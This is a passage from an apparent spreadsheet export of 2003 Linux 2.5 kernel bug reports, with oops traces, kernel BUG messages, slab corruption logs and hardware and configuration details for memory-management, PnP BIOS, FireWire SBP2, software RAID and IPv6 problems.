    <t>Distribution: Red Hat 8.0 Hardware Environment: 8-way P3-700Mhz, 10G RAM Software Environment: gcc version 3.2 20020903 (Red Hat Linux 8.0 3.2-7) GNU C Library development release version 2.2.93 GNU ld version 2.13.90.0.2 Problem Description: Didn't lock the machine up, but dmesg indicates oops: Unable to handle kernel paging request at virtual address 6b6b6b5b printing eip: c014646f *pde = 00000000 Oops: 0000 CPU: 5 EIP: 0060:[&lt;c014646f&gt;] Not tainted EFLAGS: 00010202 EIP is at find_vma+0x3b/0x58 eax: 6b6b6b53 ebx: 4148d000 ecx: f7687f14 edx: 6b6b6b6b esi: f74eb044 edi: 00000005 ebp: c1bb1d1c esp: c1bb1d14 ds: 007b es: 007b ss: 0068 Process kswapd0 (pid: 30, threadinfo=c1bb0000 task=f7c139a0) Stack: 4148d000 f74eb044 c1bb1d40 c0148ed7 f74eb044 4148d000 c180b330 f668930c 00000005 c0dfa234 c180b330 c1bb1d7c c01490d3 00000001 c180b330 c04a3600 ffffffef c0148af8 00000060 00000014 f6689310 c1bb0000 c05854e0 00000005 Call Trace: [&lt;c0148ed7&gt;] try_to_unmap_one+0x77/0x180 [&lt;c01490d3&gt;] try_to_unmap+0xf3/0x1f0 [&lt;c0148af8&gt;] page_referenced+0x88/0xe0 [&lt;c014020d&gt;] shrink_list+0x221/0x5c8 [&lt;c013f1b8&gt;] __pagevec_release+0x1c/0x2c [&lt;c0140792&gt;] shrink_cache+0x1de/0x388 [&lt;c014100c&gt;] shrink_zone+0x7c/0x88 [&lt;c0141267&gt;] balance_pgdat+0xd7/0x154 [&lt;c01413e7&gt;] kswapd+0x103/0x108 [&lt;c01412e4&gt;] kswapd+0x0/0x108 [&lt;c011d060&gt;] autoremove_wake_function+0x0/0x3c [&lt;c011d060&gt;] autoremove_wake_function+0x0/0x3c [&lt;c0107125&gt;] kernel_thread_helper+0x5/0xc Code: 39 5a f0 76 f1 89 c1 39 5a ec 77 e5 85 c9 74 03 89 4e 08 89 Steps to reproduce: 1.) build/boot kernel 2.) start ltp with 8 instances for 120h</t>
  </si>
  <si>
    <t>PNPBios blows up hard during boot</t>
  </si>
  <si>
    <t>2003-03-11 17:16 UTC</t>
  </si>
  <si>
    <t>2003-04-07 19:20 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: Compaq Armada 1590DMT Laptop Software Environment: GCC 2.95.4 Problem Description: I'm trying out 2.5 on my laptop, and it blows up hard during boot; so hard that ksymsall oops too :( Linux Plug and Play Support v0.95 (c) Adam Belay pnp: Enabling Plug and Play Card Services. PnPBIOS: Found PnP BIOS installation structure at 0xc00fe2d0 PnPBIOS: PnP BIOS version 1.0, entry 0xf0000:0x2621, dseg 0xf0000 PnPBIOS: 19 nodes reported by PnP BIOS; 19 recorded by driver Unable to handle kernel paging request at virtual address 00005edb printing eip: 00002238 *pde = 00000000 Oops: 0002 CPU: 0 EIP: 0098:[&lt;00002238&gt;] Not tainted EFLAGS: 00010046 EIP is at 0x2238 eax: 000000c0 ebx: 00000002 ecx: 00020000 edx: 000000e4 esi: c4fc9c83 edi: c4fa00e5 ebp: c4fc5edc esp: c4fc5ed6 ds: 00b0 es: 00b0 ss: 0068 Process swapper (pid: 1, threadinfo=c4fc4000 task=c4fc2000) Stack: 00009c83 00260000 002e984e 232e00a0 9c830000 5ef6002e 00e50002 00e40000 000000a0 5f28984e 9d1b00a0 00462719 0006267a 007b0000 f064007b 5fbbc4fa 00a0c4fc 00b00000 00010002 00a80000 02020000 000b0000 00010090 00a80000 Call Trace: [&lt;c0124132&gt;] unblock_all_signals+0xe/0x1e0 Unable to handle kernel paging request at virtual address c5000000 printing eip: c0109de0 *pde = 00000000 arch/i386/kernel/traps.c:251: spin_lock(arch/i386/kernel/traps.c:c0377e3c) alrea dy locked by arch/i386/kernel/traps.c/251 Oops: 0000 CPU: 0 EIP: 0060:[&lt;c0109de0&gt;] Not tainted EFLAGS: 00010002 EIP is at show_trace+0x30/0x8c eax: c4fffffe ebx: 922b8222 ecx: 0000001e edx: 00000096 esi: 00000018 edi: 00000068 ebp: 00000001 esp: c4fc5d8e ds: 007b es: 007b ss: 0068 Process swapper (pid: 1, threadinfo=c4fc4000 task=c4fc2000) Stack: c4fc5f36 c0109ec6 c4fffffe c02f6a66 c4fc5ed6 c4fc5ea2 c0109fd2 c4fc5ed6 c02f6bcc c0377e3c 00000002 c4fc5ea2 c4fc5edc c010a1a0 c4fc5ea2 c02f6c81 c02fe0de 00000002 c4fc5ea2 00000001 00000000 c4fc2000 00005edb c01134dc Call Trace: [&lt;c0109ec6&gt;] show_stack+0x6a/0x70 [&lt;c0109fd2&gt;] show_registers+0xf6/0x16 I'm going to recompile without ksysmall, and then ksymoops the oops to get the whole thing...</t>
  </si>
  <si>
    <t>SBP2 driver doesn't appear to register a block device?</t>
  </si>
  <si>
    <t>2.5.65</t>
  </si>
  <si>
    <t>2003-03-17 20:30 UTC</t>
  </si>
  <si>
    <t>2003-05-12 09:20 UTC</t>
  </si>
  <si>
    <t>Distribution: Red Hat 8.0 Hardware Environment: Single Processor Pentium III, details below Software Environment: Problem Description: Loading ieee1394 SBP2 driver doesn't result in a usable block device appearing. Steps to reproduce: Attach firewire drive. Boot 2.5.65, load ieee1394, ohci1394, sbp2 modules. The firewire to IDE bridge is correctly detected, as is the actual hard drive attached to the bridge. Everything seems to be fine, but the drive does not show up in /proc/partitions, and I can't mount /dev/sda1. (Under a 2.4.x kernel, /dev/sda and /dev/sda1 would show up at this point) Here is more information: ieee1394 and SCSI settings from .config: CONFIG_SCSI=m CONFIG_BLK_DEV_SD=m CONFIG_BLK_DEV_SR=m CONFIG_CHR_DEV_SG=m CONFIG_IEEE1394=m CONFIG_IEEE1394_OHCI1394=m CONFIG_IEEE1394_SBP2=m dmesg after loading the modules has: ohci1394_0: Unexpected PCI resource length of 1000! ohci1394_0: OHCI-1394 1.0 (PCI): IRQ=[9] MMIO=[e9000000-e90007ff] Max Packet=[2048] ieee1394: Node added: ID:BUS[00:1023] GUID[0004830000002cb3] [Unknown] (Oxford ) ieee1394: Host added: ID:BUS[01:1023] GUID[0030dd8000505e29] [Unknown] (Linux OHCI-1394) SCSI subsystem initialized scsi0 : SCSI emulation for for IEEE-1394 Storage Devices ieee1394: sbp2: Logged into SBP-2 device ieee1394: sbp2: Node[00:1023]: Max speed [S400] - Max payload [2048] Vendor: WDC WD12 Model: 00JB-00CRA1 Rev: Type: Direct-Access ANSI SCSI revision: 06 - - - thoffman@rohan linux-2.5.65]$ cat /proc/partitions major minor #blocks name 3 0 60030432 hda 3 1 1052226 hda1 3 2 5245222 hda2 3 3 1052257 hda3 3 4 1 hda4 3 5 522081 hda5 3 6 522081 hda6 3 7 51632878 hda7 cat /proc/bus/ieee1394/devices Node[00:1023] GUID[0004830000002cb3]: Vendor ID : `Unknown' [0x000483] Vendor text : `Oxford ' Capabilities: 0x0083c0 Tlabel stats: Free : 64 Total : 66 Mask : 0000000000000000 Bus Options : IRMC(0) CMC(0) ISC(0) BMC(0) PMC(0) GEN(0) LSPD(0) MAX_REC(64) CYC_CLK_ACC(255) Unit Directory 0: Vendor/Model ID : Oxford [000483] / 911D [000001] Software Spec ID : 00609e Software Version : 010483 Driver : SBP2 Driver Length (in quads): 8 Node[01:1023] GUID[0030dd8000505e29]: Vendor ID : `Unknown' [0x000000] Vendor text : `Linux OHCI-1394' Capabilities: 0x0083c0 Tlabel stats: Free : 64 Total : 23 Mask : 0000000000000000 Bus Options : IRMC(1) CMC(1) ISC(1) BMC(0) PMC(0) GEN(0) LSPD(2) MAX_REC(2048) CYC_CLK_ACC(0) Host Node Status: Host Driver : ohci1394 Nodes connected : 2 Nodes active : 2 SelfIDs received: 2 Irm ID : [01:1023] BusMgr ID : [63:1023] In Bus Reset : no Root : yes Cycle Master : yes IRM : yes Bus Manager : no cat scsi/sbp2/0 Host scsi0 : SBP-2 IEEE-1394 (ohci1394) Driver version : $Rev: 797 $ James Goodwin &lt;jamesg@filanet.com&gt; Module options : sbp2_max_speed : S400 sbp2_max_sectors : 255 sbp2_serialize_io : no sbp2_exclusive_login : yes Attached devices : [Channel: 00, Id: 00, Lun: 00] Direct-Access WDC WD12 00JB-00CRA1 - - - - - $ cat /proc/scsi/scsi Attached devices: Host: scsi0 Channel: 00 Id: 00 Lun: 00 Vendor: WDC WD12 Model: 00JB-00CRA1 Rev: Type: Direct-Access ANSI SCSI revision: 06 - - - - - $ cat /proc/devices [cut char devices] Block devices: 1 ramdisk 3 ide0 7 loop 22 ide1</t>
  </si>
  <si>
    <t>Root on software raid don't boot on new 2.5 kernel since after 2.5.45</t>
  </si>
  <si>
    <t>2003-03-18 14:14 UTC</t>
  </si>
  <si>
    <t>Troels Liebe Bentsen</t>
  </si>
  <si>
    <t>2004-07-17 17:13 UTC</t>
  </si>
  <si>
    <t>Daniele Venzano</t>
  </si>
  <si>
    <t>Distribution: Linux Mandrake 9.0 (std kernel 2.4.21-pre1) Hardware Environment: ASUS A7M266-D ACPI BIOS Revision 1006 Promise 20268 PCI IDE Controler Intel Ethernet Pro 100 ATI Radeon QD Problem Description: The software raid setup I have boots on 2.4 but not on newer 2.5 kernels, i have everything need compiled in and the 2.5 kernel also rapports that it has found /dev/md2 but it rapports that is's unable to mount the root partition for this device. I have tried to pass /dev/md0 as the root but this hangs the kernel, is root on raid broaken in kernel 2.5 or am I doing something wrong? lilo: image=/boot/vmlinuz-2.4.21-pre1 label=linux root=/dev/md2 read-only append=" devfs=mount" image=/boot/vmlinuz-2.5.65 label=linux25 root=/dev/md2 read-only append=" devfs=mount" fdisk: /dev/hda1 1 20318 10240240+ 7 HPFS/NTFS /dev/hda2 20319 116301 48375432 5 Extended /dev/hda5 20319 20522 102784+ 83 Linux /dev/hda6 20523 22554 1024096+ 83 Linux /dev/hda7 22555 116301 47248456+ fd Linux raid autodetect mdadm: # UUID removed #devices=/dev/hdd5,/dev/hdc5 ARRAY /dev/md0 level=raid1 num-devices=2 #devices=/dev/hdd6,/dev/hdc6 ARRAY /dev/md1 level=raid1 num-devices=2 #devices=/dev/hdd7,/dev/hdc7 ARRAY /dev/md2 level=raid1 num-devices=2 #devices=/dev/hdg5,/dev/hde5 ARRAY /dev/md3 level=raid0 num-devices=2 mount: /dev/md0 on /boot type ext3 (rw) /dev/md2 on / type reiserfs (rw,notail) /dev/md3 on /dist type reiserfs (rw,notail) fstab: /dev/md2 / reiserfs notail 1 1 /dev/md0 /boot ext3 defaults 1 2 /dev/md1 swap swap defaults 0 0 /dev/md3 /dist reiserfs notail 1 1</t>
  </si>
  <si>
    <t>ltp doio test gets: kernel BUG at mm/memory.c:769!</t>
  </si>
  <si>
    <t>2.5.65-mjb1</t>
  </si>
  <si>
    <t>2003-03-18 15:24 UTC</t>
  </si>
  <si>
    <t>2003-04-03 12:50 UTC</t>
  </si>
  <si>
    <t>Distribution:rhas Hardware Environment: 4(8ht)-way p4 1.6GHz summit subarch 8GB ram Software Environment: gcc 2.9 # CONFIG_PREEMPT is not set6 CONFIG_HIGHMEM64G=y CONFIG_1GB=y CONFIG_HIGHMEM=y CONFIG_X86_PAE=y CONFIG_NUMA=y CONFIG_DISCONTIGMEM=y CONFIG_SHAREPTE=y (a few bits from the config, let me know if you want the full config) Problem Description: ------------[ cut here ]------------ kernel BUG at mm/memory.c:769! invalid operand: 0000 CPU: 3 EIP: 0060:[&lt;c014201f&gt;] Not tainted EFLAGS: 00010286 EIP is at unmap_all_pages+0x41f/0x440 eax: ffffffff ebx: c17520d8 ecx: c058a910 edx: f7244c80 esi: 00000000 edi: c1752100 ebp: 00000000 esp: f2fb9ed0 ds: 007b es: 007b ss: 0068 Process doio (pid: 15117, threadinfo=f2fb8000 task=f2e7a080) Stack: c659df80 c17520d8 c0000000 c0000000 c0000000 00000000 c17520d8 eed9fff8 eed9a000 f41eec18 00000000 c053b028 00000001 00000000 00000001 c55e9f30 c55dc948 c5607940 c56716b0 c5583ca8 c5584860 c559b560 c5588078 c55e7a50 Call Trace: [&lt;c0146191&gt;] exit_mmap+0x11/0xb0 [&lt;c011db0e&gt;] mmput+0x3e/0x60 [&lt;c01213d7&gt;] do_exit+0x167/0x390 [&lt;c0145ed7&gt;] do_munmap+0x107/0x120 [&lt;c0145f34&gt;] sys_munmap+0x44/0x70 [&lt;c0108ff3&gt;] syscall_call+0x7/0xb Code: 0f 0b 01 03 29 a1 3c c0 8b 8c 24 90 00 00 00 51 e8 5c 1e fd ------------[ cut here ]------------ kernel BUG at mm/memory.c:769! invalid operand: 0000 CPU: 1 EIP: 0060:[&lt;c014201f&gt;] Not tainted EFLAGS: 00010286 EIP is at unmap_all_pages+0x41f/0x440 eax: fffffffc ebx: c179a4f0 ecx: c058a810 edx: f45b7680 esi: 00000000 edi: c179a518 ebp: 00000000 esp: eeb6fed0 ds: 007b es: 007b ss: 0068 Process doio (pid: 15118, threadinfo=eeb6e000 task=f4aeed20) Stack: c659b080 c179a4f0 c0000000 c0000000 c0000000 00000000 c179a4f0 f0a86ff8 f1611000 f4a9eed8 00000000 c053a030 00000001 00000000 00000001 c55e9f30 c55dc948 c5607940 c56716b0 c5583ca8 c5584860 c559b560 c5588078 c55e7a50 Call Trace: [&lt;c0146191&gt;] exit_mmap+0x11/0xb0 [&lt;c011db0e&gt;] mmput+0x3e/0x60 [&lt;c01213d7&gt;] do_exit+0x167/0x390 [&lt;c0145ed7&gt;] do_munmap+0x107/0x120 [&lt;c0145f34&gt;] sys_munmap+0x44/0x70 [&lt;c0108ff3&gt;] syscall_call+0x7/0xb Code: 0f 0b 01 03 29 a1 3c c0 8b 8c 24 90 00 00 00 51 e8 5c 1e fd ------------[ cut here ]------------ kernel BUG at mm/memory.c:769! invalid operand: 0000 CPU: 1 EIP: 0060:[&lt;c014201f&gt;] Not tainted EFLAGS: 00010206 EIP is at unmap_all_pages+0x41f/0x440 eax: 00000014 ebx: ece85f0c ecx: c058bc10 edx: f30e0080 esi: 00000000 edi: 0000000e ebp: 0000000e esp: ece85ed0 ds: 007b es: 007b ss: 0068 Process mmstress (pid: 15559, threadinfo=ece84000 task=f70d2ca0) Stack: c659b080 c17098b0 c0000000 c0000000 c0000000 0000000e c17098b0 ed09eff8 ecee8000 f7243e98 00000000 c0539fb0 00000001 00000000 00000001 c5838db8 c5838d68 c5838cc8 c5839768 c5829fc0 c582a010 c5828cb0 c5828f80 c582abf0 Call Trace: [&lt;c0146191&gt;] exit_mmap+0x11/0xb0 [&lt;c011db0e&gt;] mmput+0x3e/0x60 [&lt;c01213d7&gt;] do_exit+0x167/0x390 [&lt;c011bc54&gt;] schedule+0x3c4/0x490 [&lt;c0108ff3&gt;] syscall_call+0x7/0xb Code: 0f 0b 01 03 29 a1 3c c0 8b 8c 24 90 00 00 00 51 e8 5c 1e fd Steps to reproduce: Ran ltp runalltests.sh</t>
  </si>
  <si>
    <t>2.5.65-mjb1 kernel BUG at mm/swap.c:299! on boot</t>
  </si>
  <si>
    <t>2003-03-19 14:03 UTC</t>
  </si>
  <si>
    <t>2003-06-05 13:26 UTC</t>
  </si>
  <si>
    <t>Distribution: RH 8.0 Hardware Environment: PIII-866, 256 MB Software Environment: 2.5.65-mjb1 Problem Description: On boot, I get: ... VFS: Mounted root (ext2 filesystem) readonly. Freeing unused kernel memory: 136k freed mm/swap.c:296: spin_is_locked on uninitialized spinlock e050c018. mm/swap.c:296: spin_lock( &amp;#65533;P&amp;#65533; &amp;#65533;P&amp;#65533;(&amp;#65533;P&amp;#65533; (&amp;#65533;P&amp;#65533;0&amp;#65533;P&amp;#65533;0&amp;#65533;P&amp;#65533;8&amp;#65533;P&amp;#65533;8&amp;#65533;P&amp;#65533;@&amp;#65533;P&amp;#65533;@&amp;#65533;P&amp;#65533;H&amp;#65533;P&amp;#65533;H&amp;#65533;P&amp;#65533;P&amp;#65533;P&amp;#65533;P&amp;#65533;P&amp;#65533;X&amp;#65533;P&amp;#65533;X&amp;#65533;P&amp;#65533;`&amp;#65533;P&amp;#65533;`&amp;#65533;P&amp;#65533;h&amp;#65533;P&amp;#65533;h&amp;#65533;P&amp;#65533;p&amp;#65533;P&amp;#65533;p&amp;#65533;P&amp;#65533;x&amp;#65533;P&amp;#65533;x&amp;#65533;P&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;: e050c018) already locked by (&amp;#65533;P&amp;#65533; (&amp;#65533;P&amp;#65533;0&amp;#65533;P&amp;#65533;0&amp;#65533;P&amp;#65533;8&amp;#65533;P&amp;#65533;8&amp;#65533;P&amp;#65533;@&amp;#65533;P&amp;#65533;@&amp;#65533;P&amp;#65533;H&amp;#65533;P&amp;#65533;H&amp;#65533;P&amp;#65533;P&amp;#65533;P&amp;#65533;P&amp;#65533;P&amp;#65533;X&amp;#65533;P&amp;#65533;X&amp;#65533;P&amp;#65533;`&amp;#65533;P&amp;#65533;`&amp;#65533;P&amp;#65533;h&amp;#65533;P&amp;#65533;h&amp;#65533;P&amp;#65533;p&amp;#65533;P&amp;#65533;p&amp;#65533;P&amp;#65533;x&amp;#65533;P&amp;#65533;x&amp;#65533;P&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;&amp;#65533;&amp;#65533;P&amp;#65533;/ -531578840 ------------[ cut here ]------------ kernel BUG at mm/swap.c:299! invalid operand: 0000 CPU: 0 EIP: 0060:[&lt;e014a699&gt;] Not tainted EFLAGS: 00010096 EIP is at __pagevec_lru_add_active+0xe9/0x260 eax: ffffffff ebx: e050bff0 ecx: e0460be0 edx: 00001aad esi: e050bff0 edi: e1278918 ebp: 00000001 esp: efed4e7c ds: 007b es: 007b ss: 0068 Process init (pid: 1, threadinfo=efed4000 task=e128e000) Stack: e0401cc0 e04062d2 00000128 e050c020 e050c018 e050c028 e050c028 efd12d00 42126000 efd12d00 efd0b2e0 e0149da3 e04641e0 e0154d08 4212b000 e0154ddf efd0b2f8 efd12d04 efd0b32c 4212b000 00000000 efd12d00 4212b000 e01550c3 Call Trace: [&lt;e0149da3&gt;] lru_add_drain+0x23/0x40 [&lt;e0154d08&gt;] unmap_region+0x18/0xb0 [&lt;e0154ddf&gt;] detach_vmas_to_be_unmapped+0x3f/0x70 [&lt;e01550c3&gt;] do_munmap+0x183/0x2a0 [&lt;e01541f5&gt;] do_mmap_pgoff+0x215/0x710 [&lt;e0155e19&gt;] mprotect_fixup+0x169/0x270 [&lt;e0111d43&gt;] old_mmap+0xe3/0x140 [&lt;e0109f5f&gt;] syscall_call+0x7/0xb Code: 0f 0b 2b 01 d2 62 40 e0 b8 06 00 00 00 0f ab 07 19 c0 85 c0 &lt;0&gt;Kernel panic: Attempted to kill init! &lt;1&gt;Unable to handle kernel paging request at virtual address ff219df0 printing eip: e01486a8 *pde = 00000000 Oops: 0002 CPU: 0 EIP: 0060:[&lt;e01486a8&gt;] Not tainted EFLAGS: 00010082 EIP is at free_block+0xb8/0x1f0 eax: 00000000 ebx: e127899c ecx: 077e850f edx: 00000000 esi: efedd2e0 edi: 00000000 ebp: efedd2ec esp: e04e1f1c ds: 007b es: 007b ss: 0068 Process init (pid: 1, threadinfo=e04e1000 task=e128e000) Stack: 00000001 00000092 efdf6fd0 00000286 e0145930 e04e1f44 e011a17e efedd2fc efedd2e0 efdeec00 efdeec10 00000008 e0149240 efedd2e0 efdeec10 00000008 00000001 00000000 e012a3f6 e050bcc0 efedd3 --------------------------------------- Gor some reason my serial console stopped capturing at this point, but if you need the rest I can hand copy. Steps to reproduce: 2.5.65-mjb1 boot</t>
  </si>
  <si>
    <t>poisoned oops in ext3_writepage</t>
  </si>
  <si>
    <t>2003-03-19 14:37 UTC</t>
  </si>
  <si>
    <t>2003-03-24 08:06 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: x86 cpu, PIIX4 IDE, Maxtor ATA DISK drives, 256mb RAM Software Environment: Linux razor 2.5.65 #9 Tue Mar 18 09:48:05 EST 2003 i686 Pentium II (Klamath) GenuineIntel GNU/Linux Gnu C 2.95.4 Gnu make 3.79.1 util-linux 2.11n mount 2.11n module-init-tools implemented e2fsprogs 1.30-WIP reiserfsprogs 3.6.3 Linux C Library 2.2.5 Dynamic linker (ldd) 2.2.5 Procps 2.0.7 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 4.5.2 CONFIG_EXT3_FS=y # CONFIG_EXT3_FS_XATTR is not set CONFIG_JBD_DEBUG=y CONFIG_DEBUG_KERNEL=y CONFIG_DEBUG_STACKOVERFLOW=y CONFIG_DEBUG_SLAB=y CONFIG_DEBUG_IOVIRT=y CONFIG_MAGIC_SYSRQ=y CONFIG_DEBUG_SPINLOCK=y CONFIG_KALLSYMS=y CONFIG_DEBUG_SPINLOCK_SLEEP=y CONFIG_FRAME_POINTER=y Problem Description: Unable to handle kernel paging request at virtual address 6b6b6b80 printing eip: c019790c *pde = 00000000 Oops: 0002 CPU: 0 EIP: 0060:[&lt;c019790c&gt;] Not tainted EFLAGS: 00010292 EIP is at ext3_writepage+0x40c/0x5bc eax: 6b6b6b6b ebx: 00000000 ecx: c13e9a34 edx: 00000000 esi: cf03bd34 edi: ceca3314 ebp: c1945bf0 esp: c1945bd4 ds: 007b es: 007b ss: 0068 Process apache (pid: 3429, threadinfo=c1944000 task=c6856000) Stack: cf03bd34 c1944000 c1945c24 c1945c44 00000001 00000000 c9f10ca4 c1945c8c c0140f88 c1170700 c1945c24 c1945cd4 c03b83dc c103bf88 c1170700 00000000 00000000 ceca33d0 c1945c1c c1945c1c 00000000 00000000 00000000 00000020 Call Trace: [&lt;c0140f88&gt;] shrink_list+0x2b8/0x4b0 [&lt;c010b651&gt;] do_IRQ+0x2d1/0x2ec [&lt;c0117172&gt;] schedule+0x39e/0x5c4 [&lt;c01413d3&gt;] shrink_cache+0x253/0x514 [&lt;c011545b&gt;] do_page_fault+0x14b/0x40e [&lt;c0115310&gt;] do_page_fault+0x0/0x40e [&lt;c0142028&gt;] shrink_zone+0x68/0x74 [&lt;c01420a3&gt;] shrink_caches+0x6f/0xa0 [&lt;c0142163&gt;] try_to_free_pages+0x8f/0xcc [&lt;c013a118&gt;] __alloc_pages+0x1c8/0x274 [&lt;c0145c12&gt;] do_anonymous_page+0x232/0x4d4 [&lt;c0145eea&gt;] do_no_page+0x36/0x47c [&lt;c013a4ee&gt;] get_page_state+0xe/0x14 [&lt;c0146410&gt;] handle_mm_fault+0xe0/0x244 [&lt;c011545b&gt;] do_page_fault+0x14b/0x40e [&lt;c0115310&gt;] do_page_fault+0x0/0x40e [&lt;c0148b21&gt;] do_brk+0x105/0x1cc [&lt;c014728b&gt;] sys_brk+0xcb/0xf8 [&lt;c0109c7d&gt;] error_code+0x2d/0x38 Code: c6 40 15 01 83 c4 04 85 db 0f 44 da 85 db 74 15 53 68 4d 40 Steps to reproduce: I was running dbench 32 on an ext3 partition without htree, and was running ab (apache bench) on the local webserver, 200 concurrent connections to a php script. The system survived the oops. All filesystems have been fscked within the last 5 days. After the oops, a forced fsck shows all filesystems are clean. All ext3 filesystems are mounted with "defaults,noatime,errors=remount-ro" options.</t>
  </si>
  <si>
    <t>Kernel OOPs when tty work timer not deleted</t>
  </si>
  <si>
    <t>2.5.6x-2.5.66-bk3+</t>
  </si>
  <si>
    <t>2003-03-20 08:14 UTC</t>
  </si>
  <si>
    <t>2003-04-18 15:48 UTC</t>
  </si>
  <si>
    <t>Distribution: LFS Hardware Environment: IBM 300PL 6892-N2U PIII (Katmai) 128MB Problem Description: Kernel panics randomly during IRQ requests. Steps to reproduce: Use machine a bit, sometimes turning on another machine next to it will cause the box to dump panic other times, the machine will just hang. A new oops report will be added to this bug tonight (the box just crashed so when I get home I will have it dump).</t>
  </si>
  <si>
    <t>2003-03-21 08:47 UTC</t>
  </si>
  <si>
    <t>2003-05-05 09:36 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge Hardware Environment: IBM Thinkpad 600 Problem Description: The kernel log contains: ALSA sound/isa/cs423x/cs4236_lib.c:302: CS4236: [0x538] C1 (version) = 0xe8, ext = 0xe8 Slab corruption: start=c46acd60, expend=c46ad36f, problemat=c46acd68 Data: ********6A *************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************&lt;7&gt;eth0: no IPv6 routers present *****************************************************************************************************************************************************************************************************************************************************************************************************************A5 Next: 01 00 00 00 00 00 3C C4 04 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF 7B 00 00 00 78 00 00 00 slab error in check_poison_obj(): cache `task_struct': object was modified after freeing Call Trace: [&lt;c0130a7d&gt;] __slab_error+0x21/0x28 [&lt;c0130e6c&gt;] check_poison_obj+0x174/0x180 [&lt;c0131fc9&gt;] kmem_cache_alloc+0x8d/0x128 [&lt;c0116a04&gt;] dup_task_struct+0x70/0xd0 [&lt;c0116a04&gt;] dup_task_struct+0x70/0xd0 [&lt;c0117475&gt;] copy_process+0x99/0xb40 [&lt;c0117f96&gt;] do_fork+0x7a/0x148 [&lt;c01077c0&gt;] sys_fork+0x18/0x28 [&lt;c0108d3b&gt;] syscall_call+0x7/0xb Steps to reproduce: This is when booting the system; I've not yet rebooted and will try again.</t>
  </si>
  <si>
    <t>Debug: sleeping function called from illegal context at include/linux/rwsem.h:43</t>
  </si>
  <si>
    <t>IPV6</t>
  </si>
  <si>
    <t>2003-03-21 08:51 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge Hardware Environment: IBM Thinkpad 600 Problem Description: When booting I get: Debug: sleeping function called from illegal context at include/linux/rwsem.h:43 Call Trace: [&lt;c0116628&gt;] __might_sleep+0x54/0x5c [&lt;c01cac71&gt;] crypto_alg_lookup+0x21/0xc8 [&lt;c01cbb3d&gt;] crypto_alg_mod_lookup+0xd/0x30 [&lt;c01cae2d&gt;] crypto_alloc_tfm+0x11/0xc0 [&lt;c02c40d0&gt;] __ipv6_regen_rndid+0xa0/0x1f4 [&lt;c0114ca1&gt;] wake_up_process+0xd/0x14 [&lt;c02c4252&gt;] ipv6_regen_rndid+0x2e/0xc4 [&lt;c011f099&gt;] run_timer_softirq+0xf1/0x144 [&lt;c02c4224&gt;] ipv6_regen_rndid+0x0/0xc4 [&lt;c011b8f1&gt;] do_softirq+0x51/0xb0 [&lt;c010a300&gt;] do_IRQ+0x114/0x130 [&lt;c0106f54&gt;] default_idle+0x0/0x34 [&lt;c0106f54&gt;] default_idle+0x0/0x34 [&lt;c0108ea8&gt;] common_interrupt+0x18/0x20 [&lt;c0106f54&gt;] default_idle+0x0/0x34 [&lt;c0106f54&gt;] default_idle+0x0/0x34 [&lt;c0106f7a&gt;] default_idle+0x26/0x34 [&lt;c0107009&gt;] cpu_idle+0x35/0x44 [&lt;c0105000&gt;] rest_init+0x0/0x5c [&lt;c0105055&gt;] rest_init+0x55/0x5c __ipv6_regen_rndid(): too short regeneration interval; timer diabled for eth0. 